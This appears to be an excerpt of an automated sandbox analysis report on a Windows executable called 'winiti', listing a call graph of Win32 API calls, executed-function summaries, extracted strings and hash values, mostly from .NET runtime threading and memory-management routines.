LeaveCriticalSection 16211 13fe017bd 16208->16211 16209->16208 16213 13fe01745 LeaveCriticalSection 16209->16213 16219 13fdfe7a0 16210->16219 16211->16053 16213->16206 16215 13fe0178d 16214->16215 16215->16210 16216 13fe01791 16215->16216 16216->16211 16217 13fe0179b EnterCriticalSection 16216->16217 16217->16208 16218->16069 16221 13fdfe7d1 16219->16221 16220 13fdfe965 16220->16211 16221->16220 16222 13fdfe94f DebugBreak 16221->16222 16223 13fdfe954 16221->16223 16222->16223 16223->16220 16224 13fdfe960 DebugBreak 16223->16224 16224->16220 16225->15974 16227 13fddb34f 16226->16227 16228 13fddb355 SetThreadPriority ResumeThread CloseHandle 16226->16228 16227->15976 16228->15976 16230 13fde4383 _swprintf_c_l 16229->16230 16234 13fde43a9 ISource _swprintf_c_l 16230->16234 16238 13fde5300 16230->16238 16232 13fde43a0 16233 13fddb410 InitializeCriticalSectionEx 16232->16233 16232->16234 16233->16234 16234->15984 16234->16234 16236 13fddb3f0 DeleteCriticalSection 16235->16236 16237 13fde45f2 16236->16237 16239 13fde2a00 3 API calls 16238->16239 16240 13fde5322 16239->16240 16241 13fde532a 16240->16241 16242 13fde2930 3 API calls 16240->16242 16241->16232 16243 13fde5348 16242->16243 16246 13fde5353 _swprintf_c_l 16243->16246 16247 13fde29e0 VirtualFree 16243->16247 16245 13fde546e 16245->16232 16246->16232 16247->16245 16249 13fddb1ee GetProcAddress 16248->16249 16250 13fddb203 16248->16250 16249->16250 16250->15775 16252 13fddb19e GetProcAddress 16251->16252 16253 13fddb1b3 16251->16253 16252->16253 16253->15777 16255 13fddb234 16254->16255 16255->16255 16256 13fddb23d GetStdHandle WriteFile 16255->16256 16256->15772 16257 13fdd9500 16258 13fdd951f 16257->16258 16259 13fdd9542 16258->16259 16269 13fddb2e0 CreateThread 16258->16269 16261 13fdd9534 16262 13fdd953d 16261->16262 16263 13fdd9549 16261->16263 16272 13fddfc10 16262->16272 16276 13fddfcf0 16263->16276 16266 13fdd9559 16267 13fddfc10 CloseHandle 16266->16267 16268 13fdd9563 16267->16268 16270 13fddb309 CloseHandle 16269->16270 16271 13fddb304 16269->16271 16270->16261 16271->16261 16273 13fddfc1f 16272->16273 16274 13fddfc34 16272->16274 16273->16274 16275 13fddfc28 CloseHandle 16273->16275 16274->16259 16275->16274 16278 13fddfd1d 16276->16278 16280 13fddfd77 16276->16280 16277 13fddfd9e 16279 13fddad00 4 API calls 16277->16279 16278->16277 16281 13fddfd58 16278->16281 16279->16280 16280->16266 16283 13fddad00 16281->16283 16284 13fddad3c SetLastError CoWaitForMultipleHandles 16283->16284 16285 13fddad25 WaitForMultipleObjectsEx 16283->16285 16286 13fddad7e 16284->16286 16287 13fddad6a 16284->16287 16285->16286 16286->16280 16287->16286 16288 13fddad6e SetLastError 16287->16288 16288->16286 16289 13fdd6620 16290 13fdd6645 16289->16290 16291 13fdd6659 16290->16291 16292 13fdd671f 16290->16292 16295 13fdd6706 16290->16295 16300 13fdd66c8 16290->16300 16301 13fdd66e7 16290->16301 16293 13fdd673f 16292->16293 16294 13fdd6726 16292->16294 16298 13fdd676f 16293->16298 16311 13fdd63b0 GetLastError 16293->16311 16297 13fddb220 2 API calls 16294->16297 16305 13fdd4c30 16295->16305 16299 13fdd6732 RaiseFailFastException 16297->16299 16299->16293 16303 13fdd66d0 Sleep 16300->16303 16301->16295 16304 13fdd66f9 RaiseFailFastException 16301->16304 16303->16301 16303->16303 16304->16295 16306 13fdd4c56 16305->16306 16307 13fddacc0 3 API calls 16306->16307 16310 13fdd4c74 16306->16310 16308 13fdd4c6c 16307->16308 16314 13fdd5920 16308->16314 16310->16292 16312 13fdd63e0 16311->16312 16313 13fdd6406 SetLastError 16312->16313 16315 13fdd594f 16314->16315 16316 13fddaa30 VirtualQuery 16315->16316 16317 13fdd599c 16316->16317 16318 13fdd59ad 16317->16318 16319 13fdd59a0 RaiseFailFastException 16317->16319 16320 13fdddcc0 4 API calls 16318->16320 16319->16318 16321 13fdd59b5 16320->16321 16321->16310 16322 13fdedf5b 16326 13fe0ea80 16322->16326 16324 13fdedf33 16324->16324 16325 13fe0ea80 6 API calls 16324->16325 16325->16324 16329 13fdeabf0 16326->16329 16328 13fe0eab8 16328->16324 16330 13fdeac47 16329->16330 16331 13fdeaffa 16330->16331 16337 13fe0e8f0 16330->16337 16331->16328 16334 13fdeaf31 16334->16331 16349 13fdf2680 16334->16349 16336 13fdead45 _swprintf_c_l 16336->16334 16345 13fe01840 16336->16345 16338 13fe0e909 16337->16338 16342 13fe0e919 16337->16342 16338->16336 16339 13fe0ea4b SwitchToThread 16339->16342 16340 13fe0e969 SwitchToThread 16340->16342 16341 13fe0ea57 16341->16336 16342->16339 16342->16340 16342->16341 16343 13fe0ea1c SwitchToThread 16342->16343 16344 13fe0ea07 SwitchToThread 16342->16344 16343->16342 16344->16342 16346 13fe0185f 16345->16346 16348 13fe018ca _swprintf_c_l 16345->16348 16346->16348 16354 13fde2bd0 VirtualAlloc 16346->16354 16348->16334 16350 13fe01840 2 API calls 16349->16350 16351 13fdf26b5 _swprintf_c_l 16350->16351 16352 13fe0e8f0 4 API calls 16351->16352 16353 13fdf2805 16352->16353 16353->16331 16353->16353 16355 13fde2c0b 16354->16355 16356 13fde2c1c 16354->16356 16355->16356 16357 13fde2c10 VirtualUnlock 16355->16357 16356->16348 16357->16356 16358 13fdeb118 16359 13fdeb11d 16358->16359 16360 13fdeb170 16358->16360 16361 13fe0e8f0 4 API calls 16359->16361 16368 13fdfd950 16360->16368 16363 13fdeb21a 16361->16363 16364 13fdeb245 16363->16364 16365 13fe01840 2 API calls 16363->16365 16366 13fdf2680 6 API calls 16364->16366 16365->16364 16367 13fdeb2b0 16366->16367 16369 13fdfd966 16368->16369 16370 13fdfd997 16369->16370 16371 13fdfda00 16369->16371 16372 13fdde020 4 API calls 16369->16372 16370->16359 16376 13fe104d0 16371->16376 16372->16371 16375 13fdde020 4 API calls 16375->16370 16377 13fe10595 16376->16377 16378 13fe10509 EnterCriticalSection 16376->16378 16379 13fdfda29 16377->16379 16380 13fde2930 3 API calls 16377->16380 16381 13fe10529 LeaveCriticalSection 16378->16381 16379->16370 16379->16375 16382 13fe105c6 16380->16382 16381->16377 16382->16379 16384 13fe105d7 EnterCriticalSection 16382->16384 16385 13fe105f6 16384->16385 16386 13fe105fd LeaveCriticalSection 16384->16386 16385->16386 16386->16379 16391 13fdda7a1 16392 13fdda774 16391->16392 16393 13fdda7b3 16391->16393 16398 13fde7420 16393->16398 16402 13fde75d1 16393->16402 16406 13fde744e 16393->16406 16394 13fdda7d4 16399 13fde7592 16398->16399 16400 13fde7499 16398->16400 16399->16400 16414 13fde9e40 16399->16414 16400->16394 16403 13fde75b0 16402->16403 16403->16402 16404 13fde7499 16403->16404 16405 13fde9e40 3 API calls 16403->16405 16404->16394 16405->16404 16407 13fde748b 16406->16407 16408 13fde74b5 16406->16408 16410 13fde7499 16407->16410 16411 13fde7494 DebugBreak 16407->16411 16424 13fdecf30 16408->16424 16410->16394 16411->16410 16412 13fde74d8 16412->16410 16413 13fde9e40 3 API calls 16412->16413 16413->16410 16416 13fde9e76 16414->16416 16419 13fde9eaf 16414->16419 16415 13fde9e89 SwitchToThread 16415->16416 16416->16415 16416->16419 16421 13fde28e0 16416->16421 16418 13fde9f85 ISource 16418->16400 16419->16418 16420 13fde9f80 DebugBreak 16419->16420 16420->16418 16422 13fde28ed 16421->16422 16423 13fde28e4 SleepEx 16421->16423 16422->16416 16423->16422 16435 13fdecf5f 16424->16435 16425 13fdf3670 39 API calls 16425->16435 16426 13fe04b90 GetTickCount64 16426->16435 16427 13fded019 SwitchToThread 16427->16435 16430 13fded13b 16430->16412 16432 13fded045 SwitchToThread 16432->16435 16433 13fde28e0 SleepEx 16433->16435 16434 13fe10880 WaitForSingleObject 16434->16435 16435->16425 16435->16426 16435->16427 16435->16430 16435->16432 16435->16433 16435->16434 16436 13fded00d SwitchToThread 16435->16436 16437 13fdedbe0 16435->16437 16457 13fe106c0 16435->16457 16471 13fded660 16435->16471 16436->16435 16438 13fdeddd2 16437->16438 16439 13fdedc1c 16437->16439 16442 13fe0ea80 6 API calls 16438->16442 16440 13fdedc8d 16439->16440 16441 13fdeddd7 16439->16441 16444 13fdedc9c SwitchToThread 16440->16444 16441->16438 16486 13fde7080 16441->16486 16442->16438 16448 13fdedcaa 16444->16448 16445 13fdedd51 SwitchToThread 16445->16448 16448->16438 16448->16445 16449 13fdedd7d SwitchToThread 16448->16449 16450 13fde28e0 SleepEx 16448->16450 16455 13fdedd45 SwitchToThread 16448->16455 16482 13fe10880 16448->16482 16449->16448 16450->16448 16455->16448 16458 13fe10869 16457->16458 16459 13fe106dd 16457->16459 16458->16435 16460 13fde2080 10 API calls 16459->16460 16461 13fe10704 16460->16461 16462 13fe10857 16461->16462 16463 13fde7080 WaitForSingleObject 16461->16463 16462->16435 16464 13fe1073d 16463->16464 16465 13fe10840 16464->16465 16466 13fe107c9 SwitchToThread 16464->16466 16467 13fe107f5 SwitchToThread 16464->16467 16468 13fde28e0 SleepEx 16464->16468 16469 13fe10880 WaitForSingleObject 16464->16469 16470 13fe107bd SwitchToThread 16464->16470 16465->16435 16466->16464 16467->16464 16468->16464 16469->16464 16470->16464 16472 13fded69c 16471->16472 16473 13fded80b 16471->16473 16472->16473 16474 13fde28e0 SleepEx 16472->16474 16492 13fe0cbb0 16473->16492 16476 13fded6df 16474->16476 16476->16473 16477 13fded78a SwitchToThread 16476->16477 16478 13fded7b6 SwitchToThread 16476->16478 16479 13fde28e0 SleepEx 16476->16479 16480 13fe10880 WaitForSingleObject 16476->16480 16481 13fded77e SwitchToThread 16476->16481 16477->16476 16478->16476 16479->16476 16480->16476 16481->16476 16484 13fe10896 16482->16484 16483 13fe108cd 16483->16448 16484->16483 16490 13fde2c40 WaitForSingleObject 16484->16490 16487 13fde7098 16486->16487 16491 13fde2c40 WaitForSingleObject 16487->16491 16493 13fe0cbee 16492->16493 16495 13fe0ce87 _swprintf_c_l 16493->16495 16496 13fdfd200 16493->16496 16495->16473 16506 13fdfd0a0 16496->16506 16498 13fdfd2f6 DebugBreak 16500 13fdfd305 16498->16500 16499 13fdfd211 16499->16498 16501 13fdfd2b9 DebugBreak 16499->16501 16502 13fdfd2d6 DebugBreak 16499->16502 16503 13fdfd328 16499->16503 16504 13fdfd2ed 16499->16504 16500->16503 16505 13fdfd319 DebugBreak 16500->16505 16501->16499 16502->16499 16503->16493 16504->16498 16504->16500 16505->16503 16507 13fdfd0c2 16506->16507 16508 13fdfd115 16507->16508 16510 13fdfd130 16507->16510 16517 13fded210 16508->16517 16511 13fdfe7a0 2 API calls 16510->16511 16515 13fdfd152 16511->16515 16512 13fdfd1e5 16512->16499 16513 13fdfd128 16513->16512 16524 13fdff550 16513->16524 16515->16513 16516 13fdfd1a2 EnterCriticalSection LeaveCriticalSection 16515->16516 16516->16513 16518 13fded239 16517->16518 16518->16518 16521 13fded367 16518->16521 16543 13fe04c30 16518->16543 16520 13fded4ef 16520->16513 16521->16520 16522 13fe01660 9 API calls 16521->16522 16523 13fded516 16522->16523 16523->16513 16525 13fdff569 16524->16525 16526 13fdff605 16524->16526 16547 13fdf3f10 16525->16547 16526->16512 16528 13fdff5eb 16529 13fdf6690 5 API calls 16528->16529 16531 13fdff5f8 16529->16531 16531->16512 16532 13fdff58c 16533 13fdff5ce 16532->16533 16534 13fdff591 16532->16534 16535 13fdf6690 5 API calls 16533->16535 16536 13fdff596 16534->16536 16537 13fdff5b1 16534->16537 16540 13fdff5de 16535->16540 16553 13fdf6690 16536->16553 16539 13fdf6690 5 API calls 16537->16539 16542 13fdff5c1 16539->16542 16540->16512 16541 13fdff5a4 16541->16512 16542->16512 16544 13fe04c94 16543->16544 16546 13fe04c49 16543->16546 16544->16521 16545 13fdffae0 18 API calls 16545->16546 16546->16544 16546->16545 16548 13fdf3fd4 16547->16548 16549 13fdf3f50 16547->16549 16548->16526 16548->16528 16548->16532 16549->16548 16561 13fdf3e10 16549->16561 16552 13fdf3e10 7 API calls 16552->16548 16554 13fdf66c7 16553->16554 16556 13fdf66e9 _swprintf_c_l 16554->16556 16571 13fe10630 16554->16571 16557 13fdf67d0 16556->16557 16578 13fde29c0 VirtualFree 16556->16578 16557->16541 16559 13fdf6795 16559->16557 16560 13fdf67a3 EnterCriticalSection LeaveCriticalSection 16559->16560 16560->16557 16562 13fdf3e53 EnterCriticalSection 16561->16562 16563 13fdf3ea1 16561->16563 16564 13fdf3e70 16562->16564 16565 13fdf3e7d LeaveCriticalSection 16562->16565 16566 13fde2930 3 API calls 16563->16566 16564->16565 16567 13fdf3ee1 LeaveCriticalSection 16564->16567 16565->16563 16568 13fdf3eb2 16566->16568 16569 13fdf3eed 16567->16569 16568->16569 16570 13fdf3ec0 EnterCriticalSection 16568->16570 16569->16548 16569->16552 16570->16567 16579 13fde29c0 VirtualFree 16571->16579 16573 13fe1064a 16574 13fe10694 16573->16574 16575 13fe1065b EnterCriticalSection 16573->16575 16574->16556 16576 13fe10685 LeaveCriticalSection 16575->16576 16577 13fe1067e 16575->16577 16576->16574 16577->16576 16578->16559 16579->16573 16387 13fe00750 16388 13fe0078d 16387->16388 16390 13fe007b7 16387->16390 16389 13fde2080 10 API calls 16388->16389 16389->16390 16580 13fde8602 16581 13fde8608 16580->16581 16604 13fdf9420 16581->16604 16584 13fde8644 16608 13fde2880 QueryPerformanceCounter 16584->16608 16587 13fde8662 16609 13fdda4d0 16587->16609 16589 13fde86c5 16596 13fde89d0 16589->16596 16601 13fde8954 16589->16601 16646 13fde2880 QueryPerformanceCounter 16589->16646 16591 13fde87a5 16591->16589 16625 13fdfa150 16591->16625 16594 13fde87ea 16594->16589 16595 13fdfd950 11 API calls 16594->16595 16595->16589 16597 13fdf9420 SwitchToThread 16596->16597 16599 13fde89db 16597->16599 16603 13fde89fe 16599->16603 16655 13fde28d0 SetEvent 16599->16655 16647 13fdda170 16601->16647 16605 13fde8626 16604->16605 16606 13fdf943f 16604->16606 16605->16584 16619 13fde28c0 ResetEvent 16605->16619 16606->16605 16607 13fdf9481 SwitchToThread 16606->16607 16607->16606 16608->16587 16610 13fdda4e5 16609->16610 16613 13fdda548 16610->16613 16664 13fddae00 EventEnabled 16610->16664 16612 13fdda51f 16612->16613 16665 13fdda690 EventWrite 16612->16665 16656 13fdd5140 16613->16656 16617 13fdda59c 16617->16589 16617->16591 16620 13fdf9650 16617->16620 16624 13fdf9670 16620->16624 16621 13fdfd950 11 API calls 16621->16624 16622 13fdf96da 16622->16591 16623 13fdfd200 38 API calls 16623->16624 16624->16621 16624->16622 16624->16623 16629 13fdfa165 16625->16629 16626 13fdfa24d 16627 13fded210 24 API calls 16626->16627 16632 13fdfa25f 16627->16632 16628 13fdfa264 16630 13fdfe7a0 2 API calls 16628->16630 16629->16626 16629->16628 16643 13fdfa169 16629->16643 16631 13fdfa28a 16630->16631 16631->16632 16634 13fdfa2a1 EnterCriticalSection LeaveCriticalSection 16631->16634 16633 13fdf3f10 7 API calls 16632->16633 16639 13fdfa300 16632->16639 16632->16643 16635 13fdfa2e6 16633->16635 16634->16632 16637 13fdfa2ea 16635->16637 16635->16639 16636 13fdfa3a8 DebugBreak 16638 13fdfa3b7 16636->16638 16640 13fdf6690 5 API calls 16637->16640 16638->16643 16645 13fdfa3cb DebugBreak 16638->16645 16639->16636 16641 13fdfa36b DebugBreak 16639->16641 16642 13fdfa388 DebugBreak 16639->16642 16644 13fdfa39f 16639->16644 16640->16643 16641->16639 16642->16639 16643->16594 16644->16636 16644->16638 16645->16643 16646->16601 16648 13fdda17d 16647->16648 16652 13fdda1af 16647->16652 16683 13fddae00 EventEnabled 16648->16683 16650 13fdda190 16650->16652 16684 13fdda640 EventWrite 16650->16684 16653 13fdda1fe 16652->16653 16687 13fddae00 EventEnabled 16652->16687 16653->16596 16657 13fdd517f 16656->16657 16658 13fdd51a4 FlushProcessWriteBuffers 16657->16658 16663 13fdd51d0 16658->16663 16659 13fdd52a3 16659->16617 16668 13fddae00 EventEnabled 16659->16668 16660 13fdd5209 16660->16663 16669 13fdd5ea0 16660->16669 16661 13fdd523e SwitchToThread 16661->16663 16663->16659 16663->16660 16663->16661 16664->16612 16666 13fe38fb0 8 API calls 16665->16666 16667 13fdda6fa 16666->16667 16667->16613 16668->16617 16670 13fdd5ec7 16669->16670 16671 13fdd5ea7 16669->16671 16670->16660 16671->16670 16672 13fddaf4e 16671->16672 16673 13fddaf22 LoadLibraryExW GetProcAddress 16671->16673 16674 13fddafaa SuspendThread 16672->16674 16675 13fddaff8 16672->16675 16681 13fddaf94 GetLastError 16672->16681 16673->16672 16674->16675 16676 13fddafb8 GetThreadContext 16674->16676 16678 13fe38fb0 8 API calls 16675->16678 16677 13fddafef ResumeThread 16676->16677 16680 13fddafd2 16676->16680 16677->16675 16679 13fddb008 16678->16679 16679->16660 16680->16677 16681->16675 16682 13fddaf9f 16681->16682 16682->16674 16683->16650 16685 13fe38fb0 8 API calls 16684->16685 16686 13fdda689 16685->16686 16686->16652 16687->16653

                  Executed Functions

                  Function 000000013FDE26B0 Relevance: 10.6, APIs: 7, Instructions: 120COMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: Process$AffinityCurrent$ErrorGroupHighestInfoLastMaskNodeNumaNumberSystem
                  • String ID:
                  • API String ID: 580471860-0
                  • Opcode ID: 19b53f92ddd9a9a7ef10cbccfe69bfe921807fcdb46f8766bab15c0bbd7aa85f
                  • Instruction ID: 736eec757c262ce87b684346fe93b305bdddd0c65ba92849bd5943a59a976299
                  • Opcode Fuzzy Hash: 19b53f92ddd9a9a7ef10cbccfe69bfe921807fcdb46f8766bab15c0bbd7aa85f
                  • Instruction Fuzzy Hash: 3551E132E04B4486EB52DF6AE8843DA77A1F769BC1F840039EE4D87364EB38C606C700
                  Function 000000013FDD5760 Relevance: 5.3, APIs: 1, Strings: 2, Instructions: 95COMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                    • Part of subcall function 000000013FDDB020: FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,000000013FDD576B), ref: 000000013FDDB02B
                    • Part of subcall function 000000013FDDB020: QueryInformationJobObject.KERNEL32 ref: 000000013FDDB0FE
                    • Part of subcall function 000000013FDDAEC0: GetModuleHandleExW.KERNEL32(?,?,?,?,000000013FDD3819), ref: 000000013FDDAED1
                  • RtlAddVectoredExceptionHandler.NTDLL ref: 000000013FDD57D8
                    • Part of subcall function 000000013FDDD7B0: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013FDDD8AD
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: AllocExceptionHandleHandlerInformationModuleObjectQueryVectored_wcsicmp
                  • String ID: StressLogLevel$TotalStressLogSize
                  • API String ID: 2876344857-4058818204
                  • Opcode ID: b8dcc97092589a3276693584986118e267024c8b20105f4c83ed43bccf9c10d3
                  • Instruction ID: 6fcc762c9220a6e87cff8b587366660e67260a395e6df9b0e9ad30481eba0372
                  • Opcode Fuzzy Hash: b8dcc97092589a3276693584986118e267024c8b20105f4c83ed43bccf9c10d3
                  • Instruction Fuzzy Hash: F441AF32E1074082FA51AFA1E4097D973A1EF85788F485029FE49177EADB74CB4BC780
                  Function 000000013FDE2260 Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 107COMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: GlobalMemoryStatus$Process$CurrentInformationObjectQuery
                  • String ID: @$@$@
                  • API String ID: 2645093340-1177533131
                  • Opcode ID: ca88b2e47b65645c36c042b4dc4072e1c75f948b70b361a8b6e96ed663280510
                  • Instruction ID: e492ddee73dbb625dfe29c123d39e53e25c698c0fd73a6e7a5611deaf27ba14d
                  • Opcode Fuzzy Hash: ca88b2e47b65645c36c042b4dc4072e1c75f948b70b361a8b6e96ed663280510
                  • Instruction Fuzzy Hash: CB512C32B09AC085EB719F55E5443DAB3A0F798B90F44423ADA9D53B98DF7CC54A8B00
                  Function 000000013FDDB020 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 90memoryCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  • FlsAlloc.KERNEL32(?,?,?,?,?,?,?,?,000000013FDD576B), ref: 000000013FDDB02B
                    • Part of subcall function 000000013FDE26B0: GetSystemInfo.KERNELBASE(?,?,?,?,?,?,?,?,?,000000013FDDB04A), ref: 000000013FDE26BF
                    • Part of subcall function 000000013FDE26B0: GetNumaHighestNodeNumber.KERNEL32 ref: 000000013FDE26FD
                    • Part of subcall function 000000013FDE26B0: GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,?,000000013FDDB04A), ref: 000000013FDE2729
                    • Part of subcall function 000000013FDE26B0: GetProcessGroupAffinity.KERNEL32 ref: 000000013FDE273A
                    • Part of subcall function 000000013FDE26B0: GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,000000013FDDB04A), ref: 000000013FDE2749
                    • Part of subcall function 000000013FDDD7B0: _wcsicmp.API-MS-WIN-CRT-STRING-L1-1-0 ref: 000000013FDDD8AD
                  • GetCurrentProcess.KERNEL32(?,?,?,?,?,?,?,?,000000013FDD576B), ref: 000000013FDDB09A
                  • GetProcessAffinityMask.KERNEL32 ref: 000000013FDDB0AD
                  • QueryInformationJobObject.KERNEL32 ref: 000000013FDDB0FE
                  Strings
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: Process$AffinityCurrent$AllocErrorGroupHighestInfoInformationLastMaskNodeNumaNumberObjectQuerySystem_wcsicmp
                  • String ID: PROCESSOR_COUNT
                  • API String ID: 296690692-4048346908
                  • Opcode ID: f854a702a83dc01c41646339c6b0099762c4a12ee8e6a0d15d954c5e394c61ba
                  • Instruction ID: 3de7096c5d51fc5c69007337340e52b751dda9deaf237b9e6cc63cd3557821f4
                  • Opcode Fuzzy Hash: f854a702a83dc01c41646339c6b0099762c4a12ee8e6a0d15d954c5e394c61ba
                  • Instruction Fuzzy Hash: 5F31C332A0464186EB249F90D8883ED63A5FB8579CF84013DE799477E5DB38CA0BD750
                  Function 000000013FDD6620 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 88sleepCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  Strings
                  • Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code., xrefs: 000000013FDD6726
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: ExceptionFailFastRaise$Sleep
                  • String ID: Fatal error. Invalid Program: attempted to call a UnmanagedCallersOnly method from managed code.
                  • API String ID: 3706814929-926682358
                  • Opcode ID: 748c09927475cf9e349a911d070e2e85ba1b369a78d20386409e9d4058d69fe5
                  • Instruction ID: 58798879c27453f5b5af52b0f429a81c2e6c07b07933697c4022721058f4657d
                  • Opcode Fuzzy Hash: 748c09927475cf9e349a911d070e2e85ba1b369a78d20386409e9d4058d69fe5
                  • Instruction Fuzzy Hash: E6416132615B4486EBA2EF6AE4587DA33E0FB08B84F04413EEA49437E5DF39C552C780
                  Function 000000013FDDB320 Relevance: 6.0, APIs: 4, Instructions: 26threadCOMMON
                  Download Yara Rule

                  Control-flow Graph

                  APIs
                  Memory Dump Source
                  • Source File: 0000000B.00000002.451620864.000000013FDD1000.00000020.00000001.01000000.0000000B.sdmp, Offset: 000000013FDD0000, based on PE: true
                  • Associated: 0000000B.00000002.451616526.000000013FDD0000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451641288.000000013FF0B000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451651795.000000013FF6B000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140030000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451667747.0000000140037000.00000004.00000001.01000000.0000000B.sdmpDownload File
                  • Associated: 0000000B.00000002.451677250.000000014003F000.00000002.00000001.01000000.0000000B.sdmpDownload File
                  Joe Sandbox IDA Plugin
                  • Snapshot File: hcaresult_11_2_13fdd0000_winiti.jbxd
                  Similarity
                  • API ID: Thread$CloseCreateHandlePriorityResume
                  • String ID:
                  • API String ID: 3633986771-0
                  • Opcode ID: 43130a00a2952a497caba751cbab80e0c5945ae47426b9584871a3a1cc0fd745
                  • Instruction ID: 51d9b90f2f0cb4bead726826c3fc5e248c1d0c8a523f80c937f40abb293b820f
                  • Opcode Fuzzy Hash: 43130a00a2952a497caba751cbab80e0c5945ae47426b9584871a3a1cc0fd745
                  • Instruction Fuzzy Hash: 5AE012B6F1170582FB159F72B8193A55354BB98BA5F484438DE4A173A0EF3CC2978644
                  Function 000000013FDE2080 Relevance: 5.4, APIs: 2, Strings: 1, Instructions: 132COMMON
                  Download Yara Rule

                  Control-flow Graph

                  • Executed
                  • Not Executed
